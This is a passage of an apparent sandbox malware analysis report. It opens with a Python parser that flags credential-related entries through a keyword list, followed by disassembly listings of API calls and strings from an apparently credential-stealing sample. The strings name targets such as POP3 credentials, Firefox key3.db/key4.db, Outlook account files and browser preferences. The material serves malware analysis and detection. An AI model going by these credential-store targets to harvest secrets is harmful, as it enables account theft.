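    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)  # (text, xref address)
    meta: dict = field(default_factory=dict)     # Source File, API ID, String ID, ...

def parse_entries(text):
    entries, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if not line:
            continue
        if line == "APIs":            # every entry begins with its APIs section
            cur = FunctionEntry()
            entries.append(cur)
            section = "APIs"
        elif line in SECTION_HEADERS:
            section = line
        elif cur is None:
            continue                  # tail of an entry that started before the excerpt
        elif section == "APIs":
            m = API_RE.match(line)
            if m:
                args = m["args"].split(",") if m["args"] is not None else []
                cur.apis.append(ApiCall(m["name"], m["mod"], args, int(m["ref"], 16),
                                        int(m["sub"], 16) if m["sub"] else None))
        elif section == "Strings":
            body, sep, xref = line.rpartition(", xrefs: ")
            if sep:
                cur.strings.append((body, int(xref, 16)))
        else:                         # "key: value" lines of the remaining sections
            key, sep, value = line.partition(": ")
            if sep:
                cur.meta[key] = value
    return entries

def first_ref(entry):
    """Lowest call site in the function body (subcall refs excluded); only an
    approximate locator, as the plugin prints call sites, not function starts."""
    own = [c.ref for c in entry.apis if c.subcall_of is None]
    return min(own) if own else None

# Substrings drawn from this report's credential-harvesting entries: the advapi32 Cred*
# family, mail-client registry paths and the Windows Live credential filter.
CRED_MARKERS = ("cred", "password", "windows live mail", "windows mail",
                "microsoft_wininet", "windowslive:name", "salt")

def credential_indicators(entry):
    """Sorted, de-duplicated tokens matching CRED_MARKERS.  GetProcAddress arguments and
    the Similarity 'String ID' count too: names resolved at run time appear there."""
    tokens = {c.name for c in entry.apis}
    for c in entry.apis:
        tokens.update(a for a in c.args if a and a != "?")
    tokens.update(text for text, _ in entry.strings)
    tokens.update(t for t in entry.meta.get("String ID", "").split("$") if t)
    return sorted(t for t in tokens if any(k in t.lower() for k in CRED_MARKERS))

if __name__ == "__main__":
    for e in parse_entries(SAMPLE):
        if hits := credential_indicators(e):
            print(f"{first_ref(e) or 0:08X} {e.meta.get('API String ID', '?')}: {', '.join(hits)}")
```

Run against the full report text, the script lists each function entry that touches a credential store together with its API String ID, which is the stable key for matching the same function across other reports of the same family; the GDI entry in SAMPLE is there to show that UI code produces no hits.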
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: _mbscpy$sprintfstrchrstrlen
                                • String ID: %s@gmail.com
                                • API String ID: 3902205911-4097000612
                                • Opcode ID: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                                • Instruction ID: 26c7b24e36a56a715c82424c63065c573d607dcbd7bcbeb2789f412f71db7656
                                • Opcode Fuzzy Hash: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                                • Instruction Fuzzy Hash: 2F21AEF290415C5AEB11DB95DCC5FDAB7FCEB54308F0405ABF108E3181EA78AB888B65
                                APIs
                                • memset.MSVCRT ref: 004094C8
                                • GetDlgCtrlID.USER32(?), ref: 004094D3
                                • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                                • memset.MSVCRT ref: 0040950C
                                • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                                • _strcmpi.MSVCRT ref: 00409531
                                  • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                • String ID: sysdatetimepick32
                                • API String ID: 3411445237-4169760276
                                • Opcode ID: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                                • Instruction ID: 275a188ed2e8c4d5dd974f468a7d06fe6df33147f8fd952053c2ef98a917a35b
                                • Opcode Fuzzy Hash: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                                • Instruction Fuzzy Hash: 2D11E773C051297EEB129754DC81EEF7BACEF5A315F0400B6FA08E2151E674DE848A64
                                APIs
                                • GetDlgItem.USER32(?,000003E9), ref: 00405A31
                                • GetDlgItem.USER32(?,000003E9), ref: 00405A47
                                • GetDlgItem.USER32(?,000003E9), ref: 00405A5F
                                • GetDlgItem.USER32(?,000003E9), ref: 00405A7A
                                • EndDialog.USER32(?,00000002), ref: 00405A96
                                • EndDialog.USER32(?,00000001), ref: 00405AA9
                                  • Part of subcall function 00405737: GetDlgItem.USER32(?,000003E9), ref: 00405745
                                  • Part of subcall function 00405737: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 0040575A
                                  • Part of subcall function 00405737: SendMessageA.USER32(?,00001032,00000000,00000000), ref: 00405776
                                • SendDlgItemMessageA.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405AC1
                                • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405BC9
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: Item$DialogMessageSend
                                • String ID:
                                • API String ID: 2485852401-0
                                • Opcode ID: ec9303a4946bc0e02ff46f830e49cd5227634f9872e1f7ef617901a07ad17536
                                • Instruction ID: 49f8b46d81ffaaf96d74304be2fa091063820ac2067ea90d1efd1f4607779086
                                • Opcode Fuzzy Hash: ec9303a4946bc0e02ff46f830e49cd5227634f9872e1f7ef617901a07ad17536
                                • Instruction Fuzzy Hash: BC619230600A45ABEB21AF65C8C5A2BB7A5EF40718F04C23BF515A76D1E778EA50CF58
                                APIs
                                • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                                • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                                • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                                • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                                • GetSysColor.USER32(0000000F), ref: 0040B472
                                • DeleteObject.GDI32(?), ref: 0040B4A6
                                • DeleteObject.GDI32(00000000), ref: 0040B4A9
                                • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: MessageSend$DeleteImageLoadObject$Color
                                • String ID:
                                • API String ID: 3642520215-0
                                • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                                • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                                APIs
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                • String ID:
                                • API String ID: 2313361498-0
                                • Opcode ID: c48968d120a8350dafd0b05c892d8c8183d7a77208ced883aa7f681ff77c883e
                                • Instruction ID: 76b7db47255e00c5a16d586f34bfaf53fe76d4163934589152c5d70c184cfcdd
                                • Opcode Fuzzy Hash: c48968d120a8350dafd0b05c892d8c8183d7a77208ced883aa7f681ff77c883e
                                • Instruction Fuzzy Hash: AF31B3B1500605AFEB24AF69CC85E2AF7A8FF44354B00853FF55AE76A1D778EC408B94
                                APIs
                                • GetClientRect.USER32(?,?), ref: 0040BB33
                                • GetWindowRect.USER32(?,?), ref: 0040BB49
                                • GetWindowRect.USER32(?,?), ref: 0040BB5C
                                • BeginDeferWindowPos.USER32(00000003), ref: 0040BB79
                                • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040BB96
                                • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040BBB6
                                • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040BBDD
                                • EndDeferWindowPos.USER32(?), ref: 0040BBE6
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: Window$Defer$Rect$BeginClient
                                • String ID:
                                • API String ID: 2126104762-0
                                • Opcode ID: 79eb62364e7a0dcd77e9d411930711777f01ecf57ddd8cbf010404b9f010fc5c
                                • Instruction ID: 10c9609a041f1aae696d54cc03c31aacdb7ad71aa251d7cd9d71944ddb51ea6f
                                • Opcode Fuzzy Hash: 79eb62364e7a0dcd77e9d411930711777f01ecf57ddd8cbf010404b9f010fc5c
                                • Instruction Fuzzy Hash: 4521C376A00209FFDB518FE8DD89FEEBBB9FB08700F144065FA55A2160C771AA519B24
                                APIs
                                • GetSystemMetrics.USER32(00000011), ref: 004072E7
                                • GetSystemMetrics.USER32(00000010), ref: 004072ED
                                • GetDC.USER32(00000000), ref: 004072FB
                                • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                                • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                                • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                                • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                                • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                • String ID:
                                • API String ID: 1999381814-0
                                • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                                • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpymemset
                                • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                • API String ID: 1297977491-3883738016
                                • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                                • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                                APIs
                                  • Part of subcall function 00449550: memset.MSVCRT ref: 0044955B
                                  • Part of subcall function 00449550: memset.MSVCRT ref: 0044956B
                                  • Part of subcall function 00449550: memcpy.MSVCRT ref: 004495C8
                                  • Part of subcall function 00449550: memcpy.MSVCRT ref: 00449616
                                • memcpy.MSVCRT ref: 0044972E
                                • memcpy.MSVCRT ref: 0044977B
                                • memcpy.MSVCRT ref: 004497F6
                                  • Part of subcall function 00449260: memcpy.MSVCRT ref: 00449291
                                  • Part of subcall function 00449260: memcpy.MSVCRT ref: 004492DD
                                • memcpy.MSVCRT ref: 00449846
                                • memcpy.MSVCRT ref: 00449887
                                • memcpy.MSVCRT ref: 004498B8
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpy$memset
                                • String ID: gj
                                • API String ID: 438689982-4203073231
                                • Opcode ID: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                • Instruction ID: 4698d9130898d2a28bd34890c38a7d1df91d0c58a43dc6add7b2b2ec2d892026
                                • Opcode Fuzzy Hash: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                • Instruction Fuzzy Hash: AB71C9B35083448BE310EF65D88069FB7E9BFD5344F050A2EE98997301E635DE09C796
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: __aulldvrm$__aullrem
                                • String ID: -$-x0$0123456789ABCDEF0123456789abcdef
                                • API String ID: 643879872-978417875
                                • Opcode ID: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                • Instruction ID: 9a4dcd4671c0eaaf570ced65c0a394ff57d12b60ca94b612a12fd923c93321e5
                                • Opcode Fuzzy Hash: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                • Instruction Fuzzy Hash: 09618C315083819FD7218F2886447ABBBE1AFC6704F18495FF8C4D7352D3B8C9998B4A
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpymemset$strlen$_memicmp
                                • String ID: user_pref("
                                • API String ID: 765841271-2487180061
                                • Opcode ID: 90d77a8e642e16426f01af40e3455a1a28465a86fb6cd763409838de826d4489
                                • Instruction ID: f707cbd7524a382ab05823b92859e6f0e78dc23985d18c56f1e7f2c379abc130
                                • Opcode Fuzzy Hash: 90d77a8e642e16426f01af40e3455a1a28465a86fb6cd763409838de826d4489
                                • Instruction Fuzzy Hash: 0B4175769041189AD714DBA5DC81FDA77ACAF44314F1042BBA605B7181EA38AB49CFA8
                                APIs
                                • GetDlgItem.USER32(?,000003E9), ref: 00405827
                                • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 00405840
                                • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 0040584D
                                • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 00405859
                                • memset.MSVCRT ref: 004058C3
                                • SendMessageA.USER32(?,00001019,?,?), ref: 004058F4
                                • SetFocus.USER32(?), ref: 00405976
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: MessageSend$FocusItemmemset
                                • String ID:
                                • API String ID: 4281309102-0
                                • Opcode ID: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                • Instruction ID: c72ca3e99ea405196032a5824f130882485a5617ada8e3d881518c79e7018221
                                • Opcode Fuzzy Hash: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                • Instruction Fuzzy Hash: 4241F8B5900209AFDB20DF94DC81EAEBBB9EF04358F1440AAE908B7291D7759E50DF94
                                APIs
                                  • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                  • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040AB7D,?,<item>), ref: 00406D4D
                                • _mbscat.MSVCRT ref: 0040A8FF
                                • sprintf.MSVCRT ref: 0040A921
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: FileWrite_mbscatsprintfstrlen
                                • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                • API String ID: 1631269929-4153097237
                                • Opcode ID: 1edff87013eeafc9988ac017b7f9a6f14c9cca9b6a50fb5f6e60c21e7938a174
                                • Instruction ID: 568bce87a3ef0860ab630a318aded4c5cbf938598f8cce33e7c60ad495c5b4cb
                                • Opcode Fuzzy Hash: 1edff87013eeafc9988ac017b7f9a6f14c9cca9b6a50fb5f6e60c21e7938a174
                                • Instruction Fuzzy Hash: 88318F32900208AFDF15DF94C886EDE7BB5FF44314F11416AF911BB2A2D779A951CB84
                                APIs
                                • memset.MSVCRT ref: 0040810E
                                  • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                  • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                  • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                  • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                                • LocalFree.KERNEL32(?,?,?,?,?,00000000,75B4EB20,?), ref: 004081B9
                                  • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                  • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                  • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                • String ID: POP3_credentials$POP3_host$POP3_name
                                • API String ID: 524865279-2190619648
                                • Opcode ID: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                                • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                                • Opcode Fuzzy Hash: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                                • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: strlen$_mbscat_mbscpymemset
                                • String ID: key3.db$key4.db
                                • API String ID: 581844971-3557030128
                                • Opcode ID: 1b23ff19475b214b98e9218dd91c9d20610f24d325a1d0b0b24a5ae2e44b1aaa
                                • Instruction ID: ca97bc5828a50012869c36cbd7bca65918f6b78bc9695587552fe8d314e031cf
                                • Opcode Fuzzy Hash: 1b23ff19475b214b98e9218dd91c9d20610f24d325a1d0b0b24a5ae2e44b1aaa
                                • Instruction Fuzzy Hash: 4B210E3190811D6ADB10AA65DC41ECE77ACDB55318F1104BBF40DF60A1EE38DA958658
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: ItemMenu$CountInfomemsetstrchr
                                • String ID: 0$6
                                • API String ID: 2300387033-3849865405
                                • Opcode ID: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                                • Instruction ID: cca6cfeb93ac41a34237a001b959014c3c2918908c2e54b2122eb51ea62ba4e3
                                • Opcode Fuzzy Hash: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                                • Instruction Fuzzy Hash: CC21AB7240C384AFD710CF61C881A9BB7E8FB89344F44093EF68896292E779DD45CB5A
                                APIs
                                • memcpy.MSVCRT ref: 004108C3
                                • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                • memcpy.MSVCRT ref: 00410961
                                Strings
                                • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041090A
                                • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 004108FD
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: FromStringUuidmemcpy
                                • String ID: 220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F
                                • API String ID: 2685851527-202910704
                                • Opcode ID: 2e7b2f23232dd97abd622906eae07d5a1462dc252c060d9f172839e787d8b35b
                                • Instruction ID: d39aacb0d07447bcfd979039f79cad875a94fb0475638bd6baea4f5a046d65b4
                                • Opcode Fuzzy Hash: 2e7b2f23232dd97abd622906eae07d5a1462dc252c060d9f172839e787d8b35b
                                • Instruction Fuzzy Hash: 6B2192B391411DAAEF11AF61DD40EEF3BACEF15354F004023F956E6211E6B8D981CBA5
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpystrlen$memsetsprintf
                                • String ID: %s (%s)
                                • API String ID: 3756086014-1363028141
                                • Opcode ID: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                                • Instruction ID: 78de9dcc32054867ea7a03e537ad908d86abacfb0a76549c44dff0155c32e653
                                • Opcode Fuzzy Hash: 50d505c1ae39098dfc6964a27cb52966afae9057970b4fe69166cd045eca6a26
                                • Instruction Fuzzy Hash: 741190B2800158AFDB21DF59CC45F99B7ACEF81308F0044A6EA58EB202D275FA15CB98
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: _mbscat$memsetsprintf
                                • String ID: %2.2X
                                • API String ID: 125969286-791839006
                                • Opcode ID: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                • Instruction ID: 3c8f4d0594b8058611f6c647f75597c7a5b0e751fa8f3ee8557cc8ef3b8c8270
                                • Opcode Fuzzy Hash: 9c39481db8383895c35f041d5bf0f4fe872cf2cabc6c5cb5cd8df66f0331d79d
                                • Instruction Fuzzy Hash: 93017072D0436425F721AA659C43BAA779CDB84705F10407FF844B62C1EABCFA444B9E
                                APIs
                                  • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                                • ??2@YAPAXI@Z.MSVCRT ref: 004441C2
                                • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
                                  • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                  • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                                  • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT ref: 00444075
                                  • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                  • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                                  • Part of subcall function 00444059: memcpy.MSVCRT ref: 004440EB
                                  • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT ref: 0044417E
                                • ??3@YAXPAX@Z.MSVCRT ref: 004441FC
                                • CloseHandle.KERNEL32(?), ref: 00444206
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                • String ID: ACD
                                • API String ID: 1886237854-620537770
                                • Opcode ID: 14acd5922900dc7186521c5d2cf315890d497fea2d0f8e510365f992a0e5d2d7
                                • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                                • Opcode Fuzzy Hash: 14acd5922900dc7186521c5d2cf315890d497fea2d0f8e510365f992a0e5d2d7
                                • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
                                APIs
                                • memset.MSVCRT ref: 004091EC
                                • sprintf.MSVCRT ref: 00409201
                                  • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                                  • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                  • Part of subcall function 0040929C: _mbscpy.MSVCRT ref: 004092FC
                                • SetWindowTextA.USER32(?,?), ref: 00409228
                                • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                • String ID: caption$dialog_%d
                                • API String ID: 2923679083-4161923789
                                • Opcode ID: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
                                • Opcode Fuzzy Hash: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                                APIs
                                Strings
                                • unknown error, xrefs: 004277B2
                                • no such savepoint: %s, xrefs: 00426A02
                                • cannot open savepoint - SQL statements in progress, xrefs: 00426934
                                • abort due to ROLLBACK, xrefs: 00428781
                                • cannot release savepoint - SQL statements in progress, xrefs: 00426A20
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: memcpy
                                • String ID: abort due to ROLLBACK$cannot open savepoint - SQL statements in progress$cannot release savepoint - SQL statements in progress$no such savepoint: %s$unknown error
                                • API String ID: 3510742995-3035234601
                                • Opcode ID: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                                • Instruction ID: e12ecffbdb4c009812b6d5dacdd15edfa1a81c90526927b9694010e916e04272
                                • Opcode Fuzzy Hash: b7610d20f233c3d9a6638e17e0c461a437a983f0e5f73351e0001e0e3acee4df
                                • Instruction Fuzzy Hash: AAC16C70A04626DFCB18CF69E584BAEBBB1BF48304F61406FE405A7351D778A990CF99
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000011.00000002.2535040450.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                Similarity
                                • API ID: memset
